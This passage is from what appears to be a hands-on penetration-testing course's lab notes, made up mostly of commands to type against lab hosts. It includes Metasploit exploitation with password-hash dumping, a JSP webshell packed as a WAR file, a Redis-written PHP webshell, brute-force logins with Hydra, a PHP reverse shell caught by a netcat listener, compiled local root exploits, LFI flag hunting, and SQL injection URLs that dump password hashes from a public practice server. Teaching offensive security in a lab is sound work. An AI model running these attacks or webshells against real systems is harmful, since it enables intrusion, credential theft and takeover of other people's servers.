1700		set RPORT 8080
1701
1702		set PATH /manager/html
1703
1704		set PAYLOAD java/meterpreter/bind_tcp
1705
1706		exploit
1707
1708
1709		run post/linux/gather/checkvm
1710
1711		run post/linux/gather/enum_configs
1712
1713		run post/linux/gather/enum_protections
1714
1715		run post/linux/gather/enum_system
1716
1717		run post/linux/gather/enum_users_history
1718
1719		run post/linux/gather/hashdump
1720
1721		shell
1722
1723		/bin/bash
1724
1725		id
1726
1727		uname -a
1728
1729		dpkg -l
1730
1731		cd /tmp
1732
1733		pwd
1734
1735
1736		cat >> exploit.c << out
1737
1738		************paste in the content from here ***************
1739		https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
1740
1741
1742		------ hit enter a few times ------
1743
1744		------ then type 'out' ----- this closes the file handle...
1745
1746
1747		gcc -o boom exploit.c
1748
1749		./boom
1750
1751		id
1752
1753
1754		-----------------------------------------------------------------------
1755
1756		---------------------------Type This-----------------------------------
1757
1758		hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
1759		-----------------------------------------------------------------------
1760
1761
1762
1763
1764
1765		-------------------------------------------index.jsp-------------------------------------------
1766		<FORM METHOD=GET ACTION='index.jsp'>
1767		<INPUT name='cmd' type=text>
1768		<INPUT type=submit value='Run'>
1769		</FORM>
1770		<%@ page import="java.io.*" %>
1771		<%
1772		String cmd = request.getParameter("cmd");
1773		String output = "";
1774		if(cmd != null) {
1775		String s = null;
1776		try {
1777		Process p = Runtime.getRuntime().exec(cmd,null,null);
1778		BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
1779		while((s = sI.readLine()) != null) { output += s+"</br>"; }
1780		} catch(IOException e) { e.printStackTrace(); }
1781		}
1782		%>
1783		<pre><%=output %></pre>
1784		-------------------------------------------index.jsp-------------------------------------------
1785
1786		*** now pack the webshell ***
1787
1788
1789		---------------------------Type This-----------------------------------
1790
1791		mkdir webshell
1792		cp index.jsp webshell
1793
1794		cd webshell
1795		jar -cvf ../webshell.war *
1796		-----------------------------------------------------------------------
1797
1798
1799		Deploy the WAR file using the built-in deploy option on the manager web-page.
1800		Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
1801		now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/
1802
1803
1804
1805		**** This section isn't finished ****
1806
1807		---------------------------Type This-----------------------------------
1808
1809		cd ~/toolz/metasploit
1810
1811		./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
1812
1813		jar tf ~/bind7777.war
1814		-----------------------------------------------------------------------
1815
1816		**** This section isn't finished ****
1817
1818		Google is your friend hahahahahahahah........
1819
1820
1821		#################
1822		# Attacking FTP #
1823		#################
1824
1825		---------------------------Type This-----------------------------------
1826
1827		sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
1828
1829		cd ~/toolz/hydra
1830
1831		hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
1832
1833		ftp
1834		open 172.31.2.24
1835		admin
1836		admin
1837		pwd
1838		ls -lah
1839
1840		ls ../../
1841		-----------------------------------------------------------------------
1842
1843
1844		#################
1845		# Attacking SSH #
1846		#################
1847
1848		---------------------------Type This-----------------------------------
1849
1850		sudo apt-get install -y libssh-dev
1851		infosecaddicts
1852		cd ~/toolz/hydra
1853		make clean
1854		./configure
1855		make
1856		sudo make install
1857
1858
1859		hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
1860
1861		ssh -p 1322 admin@172.31.2.24
1862
1863
1864		-------------------------------
1865
1866		cd ~/toolz/metasploit
1867
1868		./msfconsole
1869
1870		use auxiliary/scanner/ssh/ssh_enumusers
1871
1872		set USER_FILE /home/infosecaddicts/list.txt
1873
1874		set STOP_ON_SUCCESS true
1875
1876		set RHOSTS 172.31.2.24
1877
1878		set RPORT 1322
1879
1880		run
1881
1882
1883
1884
1885
1886		use auxiliary/scanner/ssh/ssh_login
1887
1888		set USER_FILE /home/infosecaddicts/list.txt
1889
1890		set PASS_FILE /home/infosecaddicts/list.txt
1891
1892		set STOP_ON_SUCCESS true
1893
1894		set RHOSTS 172.31.2.24
1895
1896		set RPORT 1322
1897
1898		run
1899
1900
1901		sessions -l
1902
1903		sessions -u 1
1904
1905		sessions -i 1
1906
1907		id
1908
1909		-----------------------------------------------------------------------
1910
1911
1912		########################
1913		# Attacking phpMyAdmin #
1914		########################
1915		**** This section isn't finished ****
1916
1917		---------------------------Type This-----------------------------------
1918
1919		hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
1920		-----------------------------------------------------------------------
1921
1922		**** This section isn't finished ****
1923
1924		Google is your friend hahahahahahahah........
1925
1926
1927
1928		---------------------------Type This-----------------------------------
1929
1930		wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
1931
1932		python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
1933		-----------------------------------------------------------------------
1934
1935
1936
1937
1938
1939
1940		####################
1941		# Attacking Joomla #
1942		####################
1943
1944		---------------------------Type This-----------------------------------
1945
1946		cd ~/toolz/metasploit
1947
1948		./msfconsole
1949
1950		use use auxiliary/scanner/http/joomla_plugins
1951
1952		set RHOSTS 172.31.2.24
1953
1954		set RPORT 8080
1955
1956		run
1957		-----------------------------------------------------------------------
1958
1959
1960		**** This section isn't finished ****
1961		Google is your friend hahahahahahahah........
1962
1963		#####################
1964		# Attacking Jenkins #
1965		#####################
1966
1967
1968		**** This section isn't finished ****
1969		Google is your friend hahahahahahahah........
1970
1971		#################
1972		# Attacking NFS #
1973		#################
1974
1975		---------------------------Type This-----------------------------------
1976
1977		sudo apt install -y rpcbind nfs-common
1978
1979		rpcinfo -s 172.31.2.24
1980
1981		showmount -e 172.31.2.24
1982
1983		sudo /bin/bash
1984
1985		mkdir /tmp/nfs
1986
1987		mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
1988
1989		ls /tmp/nfs
1990
1991		cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
1992
1993		umount -l /tmp/nfs
1994
1995		exit
1996
1997		sudo apt-cache search fcrackzip
1998
1999		sudo apt-get install -y fcrackzip
2000
2001		fcrackzip -u backup.tar.bz2.zip
2002
2003		unzip -P aaaaaa backup.tar.bz2.zip
2004
2005		tar jxf backup.tar.bz2
2006		-----------------------------------------------------------------------
2007
2008
2009		###################
2010		# Attacking Redis #
2011		###################
2012
2013		---------------------------Type This-----------------------------------
2014
2015		sudo nmap -p 6379 --script=redis-info 172.31.2.24
2016		infosecaddicts
2017
2018		sudo apt-get install -y redis-tools
2019		infosecaddicts
2020
2021		redis-cli -h 172.31.2.24
2022
2023		CONFIG SET dir /var/www/html/main
2024
2025		CONFIG GET dir
2026
2027		config set dbfilename boom.php
2028
2029		CONFIG GET dbfilename
2030
2031		SET cmd "<?php system($_GET['joe']); ?>"
2032
2033		BGSAVE
2034
2035		http://172.31.2.24/boom.php
2036
2037		http://172.31.2.24/boom.php?joe=id
2038
2039
2040		(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
2041
2042
2043
2044		**** This section isn't finished ****
2045		Google is your friend hahahahahahahah........
2046
2047		cd ~/toolz/metasploit
2048
2049		./msfconsole
2050
2051		use auxiliary/scanner/redis/file_upload
2052
2053		set RHOSTS 172.31.2.24
2054
2055		set LocalFile
2056
2057		**** This section isn't finished ****
2058		Google is your friend hahahahahahahah........
2059
2060
2061
2062
2063
2064		sudo nmap -sV -p 3260 172.31.2.217
2065
2066
2067		sudo apt install open-iscsi
2068
2069		sudo iscsiadm -m discovery -t st -p 172.31.2.217
2070
2071		sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
2072
2073		sudo iscsiadm -m node -p 172.31.2.217 --login
2074
2075		sudo /bin/bash
2076
2077		fdisk -l
2078		*** look for /dev/sda5 - Linux swap / Solaris *****
2079
2080		mkdir /mnt/217vm
2081
2082		mount /dev/sdb /mnt/217vm
2083
2084		cd /mnt/217vm
2085
2086		ls
2087
2088		cat flag1.txt
2089
2090		file bobsdisk.dsk
2091
2092		mkdir /media/bobsdisk
2093
2094		mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
2095
2096		/mnt/217vm# ls
2097
2098		cd /media/bobsdisk/
2099
2100		ls
2101
2102		cat ToAlice.eml
2103
2104		file bobsdisk.dsk
2105
2106		mkdir /media/bobsdisk
2107
2108		mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
2109
2110		/mnt/217vm# ls
2111
2112		cd /media/bobsdisk/
2113
2114		ls
2115
2116		cat ToAlice.eml
2117
2118		file ToAlice.csv.enc
2119
2120		file bobsdisk.dsk
2121
2122		pwd
2123
2124		mkdir /media/bobsdisk
2125
2126
2127		mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
2128
2129		ls
2130
2131		cd /media/bobsdisk/
2132
2133		ls
2134
2135		openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
2136
2137		ls
2138
2139		cat ToAlice.eml \| grep flag
2140
2141		openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
2142
2143		ls
2144
2145		cat ToAlice.eml
2146		*** look for supercalifragilisticoespialidoso ****
2147
2148		openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
2149
2150		supercalifragilisticoespialidoso
2151
2152
2153		ls
2154
2155		cat ToAlice.csv
2156		-----------------------------------------------------------------------
2157
2158		-----------------------------------------------------
2159		Web Path,Reason
2160		5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
2161		c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
2162		flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
2163
2164		-----------------------------------------------------
2165
2166		The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
2167		http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
2168		-- view source
2169
2170		Found this string in the source:
2171		R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
2172		ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
2173		bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
2174		YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
2175		ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
2176		YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
2177		TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
2178		IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
2179		ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
2180		IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
2181
2182		------ https://www.base64decode.org/ -------
2183		------ Decoded, but didn't find a flag -----
2184
2185
2186		http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
2187		-- view source --
2188		-- Nothing in source --
2189
2190		Browsed to the flag link:
2191		view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
2192		-- view source --
2193		-- Nothing in source --
2194
2195
2196		Tried a PHP base64 decode with the URL:
2197		http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
2198		http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
2199		http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
2200
2201		------ https://www.base64decode.org/ -------
2202		Use the string found here:
2203		http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
2204
2205		-------------------------------------------------------------------
2206		PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
2207		-------------------------------------------------------------------
2208		<?php
2209		defined ('VIAINDEX') or die('Ooooh! So close..');
2210		?>
2211		<h1>Flag</h1>
2212		<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
2213		<img src="trollface.png" />
2214		<?php
2215		// Ok, ok. Here's your flag!
2216		//
2217		// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
2218		//
2219		// Well done, you're doing great so far!
2220		// Next step. SHELL!
2221		//
2222		//
2223		// Oh. That flag above? You're gonna need it...
2224		?>
2225
2226		######################
2227		# Attacking Minotaur #
2228		######################
2229
2230		Step 1: Portscan/Bannergrab the target host
2231		---------------------------Type This-----------------------------------
2232		sudo nmap -sV 172.31.2.117
2233		-----------------------------------------------------------------------
2234
2235
2236
2237		Step 2: Vulnerability scan the web server
2238		---------------------------Type This-----------------------------------
2239		cd ~/toolz/
2240
2241		rm -rf nikto*
2242
2243		git clone https://github.com/sullo/nikto.git Nikto2
2244
2245		cd ~/toolz/Nikto2/program
2246
2247		perl nikto.pl -h 172.31.2.117
2248		-----------------------------------------------------------------------
2249
2250
2251
2252		Step 3: Directory brute-force the webserver
2253		---------------------------Type This-----------------------------------
2254		cd ~/toolz
2255
2256		sudo apt install -y libcurl4-openssl-dev
2257
2258		git clone https://github.com/v0re/dirb.git
2259
2260		cd dirb/
2261
2262		./configure
2263
2264		make
2265
2266		dirb
2267
2268		./dirb http://172.31.2.117 wordlists/big.txt
2269		-----------------------------------------------------------------------
2270
2271		### dirb output ###
2272		==> DIRECTORY: http://172.31.2.117/bull/
2273		-----------------------------------------------------------------------
2274
2275
2276		Step 4: Run wordpress vulnerability scanner
2277		---------------------------Type This-----------------------------------
2278		sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
2279
2280		cd ~/toolz
2281
2282		rm -rf wpsca*
2283
2284		git clone https://github.com/wpscanteam/wpscan.git
2285
2286		cd wpscan
2287
2288		sudo gem install bundler && bundle install --without test development
2289
2290		rbenv install 2.5.0-dev
2291
2292		ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
2293		-----------------------------------------------------------------------
2294
2295
2296
2297
2298		Step 5: Attack vulnerable Wordpress plugin with Metasploit
2299		---------------------------Type This-----------------------------------
2300		cd ~/toolz/metasploit
2301
2302		./msfconsole
2303
2304		use exploit/unix/webapp/wp_slideshowgallery_upload
2305
2306		set RHOST 172.31.2.117
2307
2308		set RPORT 80
2309
2310		set TARGETURI /bull
2311
2312		set WP_USER bully
2313
2314		set WP_PASSWORD Bighornedbulls
2315
2316		exploit
2317		-----------------------------------------------------------------------
2318
2319		Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
2320		This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
2321		and then from the lab network attacking other students.
2322
2323
2324		---------------------------Type This-----------------------------------
2325		wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
2326
2327		tar -zxvf php-reverse-shell-1.0.tar.gz
2328
2329		cd ~/toolz/php-reverse-shell-1.0/
2330
2331		nano php-reverse-shell.php
2332		-----------------------------------------------------------------------
2333		***** change the $ip and $port variables to a host that you have already compromised in the network
2334		***** for this example I chose 172.31.2.64 and kept port 1234
2335
2336
2337		---------------------------Type This-----------------------------------
2338		chmod 777 php-reverse-shell.php
2339		cp php-reverse-shell.php ..
2340		-----------------------------------------------------------------------
2341
2342
2343
2344		----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
2345		https://www.exploit-db.com/raw/34681/
2346
2347		python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
2348
2349		-----------------------------------------------------------------------
2350
2351
2352
2353		Set up netcat listener on previously compromised host
2354		---------------------------Type This-----------------------------------
2355		ssh -l webmin 172.31.2.64
2356		webmin1980
2357
2358		python -c 'import pty;pty.spawn("/bin/bash")'
2359
2360
2361		cd /tmp
2362
2363		./boom2
2364
2365		nc -lvp 1234
2366		-----------------------------------------------------------------------
2367
2368
2369
2370
2371		---------------------Type This in your browser ------------------------
2372		http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
2373		-----------------------------------------------------------------------
2374
2375
2376		Now check your listener to see if you got the connection
2377		---------------------------Type This-----------------------------------
2378		id
2379
2380		/sbin/ifconfig
2381
2382		python -c 'import pty;pty.spawn("/bin/bash")'
2383
2384		---------------------------Type This-----------------------------------
2385		cd /tmp
2386		cat >> exploit2.c << out
2387		-----------------------------------------------------------------------
2388		************paste in the content from here ***************
2389		https://www.exploit-db.com/raw/37292/
2390
2391		************hit enter a few times ***************
2392
2393		---------------------------Type This-----------------------------------
2394		out
2395
2396
2397		gcc -o boom2 exploit2.c
2398
2399		./boom2
2400
2401		id
2402		-----------------------------------------------------------------------
2403
2404		......YEAH - do the happy dance!!!!
2405
2406
2407
2408
2409
2410		##################
2411		# Attacking Sedna #
2412		###################
2413
2414		Attack steps:
2415		-------------
2416
2417
2418
2419		Step 1: Ping sweep the target network
2420		---------------------------Type This-----------------------------------
2421		nmap -sP 172.31.2.0/24
2422		-----------------------------------------------------------------------
2423
2424
2425
2426
2427
2428
2429		Step 2: Port scan/Bannergrab the target host
2430		---------------------------Type This-----------------------------------
2431		sudo nmap -sV 172.31.2.86
2432		-----------------------------------------------------------------------
2433
2434
2435		PORT STATE SERVICE VERSION
2436		22/tcp open ssh (protocol 2.0)
2437		53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
2438		80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
2439		110/tcp open pop3 Dovecot pop3d
2440		111/tcp open rpcbind 2-4 (RPC #100000)
2441		139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
2442		143/tcp open imap Dovecot imapd
2443		445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
2444		514/tcp filtered shell
2445		993/tcp open ssl/imap Dovecot imapd
2446		995/tcp open ssl/pop3 Dovecot pop3d
2447		8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
2448		1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
2449		SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
2450		SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
2451
2452		Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
2453		Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
2454
2455
2456
2457
2458
2459
2460
2461
2462
2463		Step 3: Vulnerability scan the webserver ports
2464		---------------------------Type This-----------------------------------
2465		cd ~/toolz/
2466
2467		rm -rf nikto*
2468
2469		git clone https://github.com/sullo/nikto.git Nikto2
2470
2471		cd Nikto2/program
2472
2473		perl nikto.pl -h 172.31.2.86
2474
2475		perl nikto.pl -h 172.31.2.86:8080
2476		-----------------------------------------------------------------------
2477
2478
2479
2480
2481
2482		Step 4: Perform directory bruteforce against the target host
2483		---------------------------Type This-----------------------------------
2484		wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
2485
2486		perl Webr00t.pl -h 172.31.2.86 -v
2487		-----------------------------------------------------------------------
2488
2489
2490
2491		or with dirbuster (dirb)
2492
2493
2494
2495
2496		---------------------------Type This-----------------------------------
2497		cd ~/toolz
2498
2499		sudo apt install -y libcurl4-openssl-dev
2500
2501		git clone https://github.com/v0re/dirb.git
2502
2503		cd dirb/
2504
2505		./configure
2506
2507		make
2508
2509		dirb
2510
2511		./dirb http://172.31.2.86 wordlists/big.txt
2512		-----------------------------------------------------------------------
2513
2514		### dirb output ###
2515		==> DIRECTORY: http://172.31.2.86/blocks/
2516		==> DIRECTORY: http://172.31.2.86/files/
2517		==> DIRECTORY: http://172.31.2.86/modules/
2518		==> DIRECTORY: http://172.31.2.86/system/
2519		==> DIRECTORY: http://172.31.2.86/themes/
2520
2521		+ http://172.31.2.86/robots.txt (CODE:200\|SIZE:36)
2522		+ http://172.31.2.86/server-status (CODE:403\|SIZE:291)
2523		### dirb output ###
2524
2525
2526
2527
2528
2529		Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
2530
2531		An exploit for this application can be found at:
2532		https://www.exploit-db.com/exploits/40390/
2533
2534
2535
2536
2537
2538		-------------------save this a "BuilderEngine.html"-------------------
2539		<html>
2540		<body>
2541		<form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
2542
2543		enctype="multipart/form-data">
2544		<input type="file" name="files[]" />
2545		<input type="submit" value="send" />
2546		</form>
2547		</body>
2548		</html>
2549		-----------------------------------------------------------------------
2550
2551
2552		Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
2553
2554		Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.
2555
2556		On the other server run:
2557		nc -lvp 1234
2558
2559		Then upload the pentestmonkey reverseshell to .86
2560
2561		============================================ Attacking another server because I need a reverse shell =========================================
2562
2563		##################
2564		# Day 1 Homework #
2565		##################
2566		Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - CyberWar Day 1" (ex: Joseph - McCray - CyberWar Day 1).
2567
2568		Also be sure to name the attached file "FirstName.LastName.CyberwarDay1.docx" (Joseph.McCray.CyberWarDay1.docx).
2569
2570		NOTE: This is what is required in order to receive your certificate of completion and CPEs.
2571
2572
2573
2574		---------------------------------------------------------------------------------------------------------------------------------------------
2575		##################################
2576		# Basic: Web Application Testing #
2577		##################################
2578
2579		Most people are going to tell you reference the OWASP Testing guide.
2580		https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
2581
2582		I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
2583
2584
2585		The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
2586
2587		1. Does the website talk to a DB?
2588		- Look for parameter passing (ex: site.com/page.php?id=4)
2589		- If yes - try SQL Injection
2590
2591		2. Can I or someone else see what I type?
2592		- If yes - try XSS
2593
2594		3. Does the page reference a file?
2595		- If yes - try LFI/RFI
2596
2597		Let's start with some manual testing against 45.77.162.239
2598
2599
2600		Start here:
2601		---------------------------Paste this into Firefox---------------------
2602		http://45.77.162.239/
2603		-----------------------------------------------------------------------
2604
2605
2606		Moving on to the login page.
2607		---------------------------Paste this into Firefox-----------------------------------
2608		http://45.77.162.239/login.aspx
2609		-------------------------------------------------------------------------------------
2610
2611		I entered a single quote (') for both the user name and the password. I got the following error:
2612
2613		Let's try throwing a single quote (') in there:
2614		---------------------------Paste this into Firefox-----------------------------------
2615		http://45.77.162.239/bookdetail.aspx?id=2'
2616		-------------------------------------------------------------------------------------
2617
2618		I get the following error:
2619
2620		Unclosed quotation mark after the character string ''.
2621		Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
2622
2623		Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
2624
2625
2626
2627
2628
2629
2630
2631
2632
2633
2634		#########################################################################################
2635		# SQL Injection #
2636		# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
2637		#########################################################################################
2638
2639
2640		- Another quick way to test for SQLI is to remove the parameter value
2641
2642
2643		#############################
2644		# Error-Based SQL Injection #
2645		#############################
2646		---------------------------Paste these one line at a time into Firefox-----------------------------------
2647		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
2648		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
2649		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
2650		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
2651		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
2652		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
2653		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
2654		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
2655		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
2656		---------------------------------------------------------------------------------------------------------
2657
2658
2659
2660
2661
2662		#############################
2663		# Union-Based SQL Injection #
2664		#############################
2665		---------------------------Paste these one line at a time into Firefox-----------------------------------
2666		http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
2667		http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
2668		http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
2669		http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
2670		http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
2671		http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
2672		http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
2673		http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
2674		http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
2675		http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
2676		---------------------------------------------------------------------------------------------------------
2677
2678		We are using a union select statement because we are joining the developer's query with one of our own.
2679		Reference:
2680		http://www.techonthenet.com/sql/union.php
2681		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
2682		It removes duplicate rows between the various SELECT statements.
2683
2684		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
2685		---------------------------Paste these one line at a time into Firefox-----------------------------------
2686		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
2687		---------------------------------------------------------------------------------------------------------
2688		Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
2689
2690		---------------------------Paste these one line at a time into Firefox-----------------------------------
2691		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
2692		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
2693		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
2694		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
2695		---------------------------------------------------------------------------------------------------------
2696
2697
2698
2699
2700		- Another way is to see if you can get the backend to perform an arithmetic function
2701		---------------------------Paste these one line at a time into Firefox-----------------------------------
2702		http://45.77.162.239/bookdetail.aspx?id=(2)
2703		http://45.77.162.239/bookdetail.aspx?id=(4-2)
2704		http://45.77.162.239/bookdetail.aspx?id=(4-1)
2705		---------------------------------------------------------------------------------------------------------
2706
2707		- This is some true/false logic testing
2708		---------------------------Paste this into Firefox-----------------------------------
2709		http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
2710		http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
2711		http://45.77.162.239/bookdetail.aspx?id=1*1
2712		http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
2713		http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
2714		http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
2715		http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
